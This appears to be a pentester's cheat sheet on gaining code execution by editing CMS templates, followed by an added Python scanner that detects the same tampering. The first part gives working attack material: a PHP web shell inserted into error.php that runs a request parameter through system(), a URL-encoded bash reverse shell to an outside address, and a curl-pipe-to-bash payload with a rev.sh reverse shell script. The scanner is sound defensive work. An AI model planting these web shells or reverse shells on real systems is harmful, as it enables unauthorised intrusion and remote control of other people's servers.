Template Manipulation

PHP

  • Navigate to site templates

  • Look for writable files (Normally error.php is a good one to look at)

  • Add this code at the beginning of the file:

if (isset($_REQUEST['tokyo'])) {
  system($_REQUEST['tokyo']);
  die();
}

  • Visiting a page that doesn't exist raises the error page; if a tokyo parameter is passed, its value is run through system(), giving code execution:

/nonexistentsite?tokyo=id

  • From here you can spawn a reverse shell by passing it as the argument:

bash+-c+'bash+-i+>%26+/dev/tcp/10.10.16.6/4444+0>%261'

  • Alternatively, you can write the reverse shell directly on the template:

<?php system("curl 10.10.14.70:8080/rev.sh|bash"); ?>

  • Then, create rev.sh:

echo -e '#!/bin/bash\nsh -i >& /dev/tcp/10.10.14.70/4444 0>&1' > rev.sh

  • Set up a Python web server, get your listener ready, and trigger error.php.
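Added example, not part of the original notes: a defender-side check in Python for the two conditions this procedure relies on, a template file the web server user can write to and an injected command-execution stub. It walks a template directory (here a constructed temporary tree; the file names, contents and permission bits are assumptions for the demo) and flags PHP files that are group- or world-writable or that contain the system($_REQUEST[...]), pipe-to-shell or /dev/tcp patterns shown above.

```python
"""Scan a CMS template directory for writable PHP files and injected
command execution (system($_REQUEST[...]), curl|bash, /dev/tcp).
Added example; the sample tree it builds is constructed, not real site data."""
import os
import re
import stat
import tempfile

# Patterns a benign template file such as error.php should never contain.
SUSPICIOUS = [
    # system/exec/... fed directly from a request parameter
    re.compile(r"\b(system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(REQUEST|GET|POST)\b"),
    # a quoted command piped into sh/bash
    re.compile(r"\b(system|exec|shell_exec|passthru)\s*\(\s*[\"'][^\"']*\|\s*(ba)?sh\b"),
    # bash network redirection used for reverse shells
    re.compile(r"/dev/tcp/"),
]


def is_group_or_world_writable(path):
    """True when the file mode grants write to group or others."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def scan_templates(root):
    """Return sorted (relative_path, finding) tuples for every .php file under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if is_group_or_world_writable(path):
                findings.append((rel, "writable-by-group-or-world"))
            with open(path, encoding="utf-8", errors="replace") as fh:
                content = fh.read()
            if any(pat.search(content) for pat in SUSPICIOUS):
                findings.append((rel, "injected-command-execution"))
    return sorted(findings)


def build_demo_tree():
    """Constructed sample tree (assumption): one clean template and one
    tampered, world-writable error.php carrying the stub from the notes."""
    root = tempfile.mkdtemp(prefix="tpl-")
    clean = os.path.join(root, "index.php")
    with open(clean, "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    os.chmod(clean, 0o644)
    tampered = os.path.join(root, "error.php")
    with open(tampered, "w") as fh:
        fh.write("<?php\nif (isset($_REQUEST['tokyo'])) {\n"
                 "  system($_REQUEST['tokyo']);\n  die();\n}\n?>\n")
    os.chmod(tampered, 0o666)
    return root


if __name__ == "__main__":
    for rel, finding in scan_templates(build_demo_tree()):
        print(f"{finding}: {rel}")
```

Run it against the real template directory instead of the demo tree (scan_templates("/path/to/templates")); any "writable-by-group-or-world" hit is the precondition the notes look for, and any "injected-command-execution" hit is worth diffing against a clean copy of the template.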
